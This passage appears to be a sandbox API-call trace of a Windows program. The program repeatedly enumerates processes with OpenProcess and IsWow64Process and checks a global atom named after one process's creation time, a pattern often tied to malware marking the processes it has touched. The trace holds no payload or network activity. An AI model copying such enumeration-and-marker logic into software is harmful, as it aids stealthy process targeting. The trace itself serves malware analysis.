	[0119.440] CloseHandle (hObject=0x698) returned 1
	[0119.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.440] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.440] CloseHandle (hObject=0x698) returned 1
	[0119.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.440] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.440] CloseHandle (hObject=0x698) returned 1
	[0119.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.440] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.440] CloseHandle (hObject=0x698) returned 1
	[0119.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.441] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.446] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.446] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.447] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.447] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.447] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.447] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.448] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.448] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.448] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.448] CloseHandle (hObject=0x698) returned 1
	[0119.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.448] CloseHandle (hObject=0x698) returned 1
	[0119.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.448] CloseHandle (hObject=0x698) returned 1
	[0119.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.449] CloseHandle (hObject=0x698) returned 1
	[0119.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.485] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.485] CloseHandle (hObject=0x698) returned 1
	[0119.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.485] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.485] CloseHandle (hObject=0x698) returned 1
	[0119.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.486] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.486] CloseHandle (hObject=0x698) returned 1
	[0119.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.486] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.486] CloseHandle (hObject=0x698) returned 1
	[0119.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.486] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.486] CloseHandle (hObject=0x698) returned 1
	[0119.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.487] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.487] CloseHandle (hObject=0x698) returned 1
	[0119.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.487] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.487] CloseHandle (hObject=0x698) returned 1
	[0119.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.487] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.487] CloseHandle (hObject=0x698) returned 1
	[0119.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.487] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.487] CloseHandle (hObject=0x698) returned 1
	[0119.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.488] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.488] CloseHandle (hObject=0x698) returned 1
	[0119.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.488] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.488] CloseHandle (hObject=0x698) returned 1
	[0119.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.488] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.488] CloseHandle (hObject=0x698) returned 1
	[0119.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.488] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.488] CloseHandle (hObject=0x698) returned 1
	[0119.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.488] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.488] CloseHandle (hObject=0x698) returned 1
	[0119.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.489] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.489] CloseHandle (hObject=0x698) returned 1
	[0119.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.489] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.489] CloseHandle (hObject=0x698) returned 1
	[0119.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.492] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.492] CloseHandle (hObject=0x698) returned 1
	[0119.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.493] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.493] CloseHandle (hObject=0x698) returned 1
	[0119.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.493] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.493] CloseHandle (hObject=0x698) returned 1
	[0119.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.493] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.493] CloseHandle (hObject=0x698) returned 1
	[0119.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.493] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.493] CloseHandle (hObject=0x698) returned 1
	[0119.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.494] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.494] CloseHandle (hObject=0x698) returned 1
	[0119.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.494] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.494] CloseHandle (hObject=0x698) returned 1
	[0119.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.494] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.494] CloseHandle (hObject=0x698) returned 1
	[0119.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.494] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.494] CloseHandle (hObject=0x698) returned 1
	[0119.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.494] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.495] CloseHandle (hObject=0x698) returned 1
	[0119.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.495] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.495] CloseHandle (hObject=0x698) returned 1
	[0119.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.495] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.495] CloseHandle (hObject=0x698) returned 1
	[0119.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.495] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.495] CloseHandle (hObject=0x698) returned 1
	[0119.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.495] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.495] CloseHandle (hObject=0x698) returned 1
	[0119.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.496] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.496] CloseHandle (hObject=0x698) returned 1
	[0119.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.496] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.497] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.497] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.497] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.497] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.498] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.498] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.498] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.498] CloseHandle (hObject=0x698) returned 1
	[0119.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.498] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.498] CloseHandle (hObject=0x698) returned 1
	[0119.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.498] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.498] CloseHandle (hObject=0x698) returned 1
	[0119.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.498] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.498] CloseHandle (hObject=0x698) returned 1
	[0119.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.608] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.608] CloseHandle (hObject=0x698) returned 1
	[0119.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.609] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.609] CloseHandle (hObject=0x698) returned 1
	[0119.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.609] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.610] CloseHandle (hObject=0x698) returned 1
	[0119.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.610] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.610] CloseHandle (hObject=0x698) returned 1
	[0119.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.610] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.610] CloseHandle (hObject=0x698) returned 1
	[0119.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.610] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.610] CloseHandle (hObject=0x698) returned 1
	[0119.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.610] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.610] CloseHandle (hObject=0x698) returned 1
	[0119.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.611] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.611] CloseHandle (hObject=0x698) returned 1
	[0119.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.611] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.611] CloseHandle (hObject=0x698) returned 1
	[0119.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.611] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.611] CloseHandle (hObject=0x698) returned 1
	[0119.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.611] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.612] CloseHandle (hObject=0x698) returned 1
	[0119.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.612] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.612] CloseHandle (hObject=0x698) returned 1
	[0119.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.612] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.613] CloseHandle (hObject=0x698) returned 1
	[0119.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.613] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.613] CloseHandle (hObject=0x698) returned 1
	[0119.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.613] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.613] CloseHandle (hObject=0x698) returned 1
	[0119.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.613] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.613] CloseHandle (hObject=0x698) returned 1
	[0119.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.613] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.614] CloseHandle (hObject=0x698) returned 1
	[0119.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.614] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.614] CloseHandle (hObject=0x698) returned 1
	[0119.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.614] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.614] CloseHandle (hObject=0x698) returned 1
	[0119.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.614] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.614] CloseHandle (hObject=0x698) returned 1
	[0119.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.614] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.614] CloseHandle (hObject=0x698) returned 1
	[0119.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.615] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.615] CloseHandle (hObject=0x698) returned 1
	[0119.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.615] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.615] CloseHandle (hObject=0x698) returned 1
	[0119.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.615] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.615] CloseHandle (hObject=0x698) returned 1
	[0119.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.615] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.615] CloseHandle (hObject=0x698) returned 1
	[0119.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.615] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.615] CloseHandle (hObject=0x698) returned 1
	[0119.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.616] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.616] CloseHandle (hObject=0x698) returned 1
	[0119.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.616] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.616] CloseHandle (hObject=0x698) returned 1
	[0119.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.616] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.616] CloseHandle (hObject=0x698) returned 1
	[0119.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.616] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.617] CloseHandle (hObject=0x698) returned 1
	[0119.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.617] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.617] CloseHandle (hObject=0x698) returned 1
	[0119.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.617] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.622] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.622] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.622] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.622] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.623] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.623] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.623] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.623] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
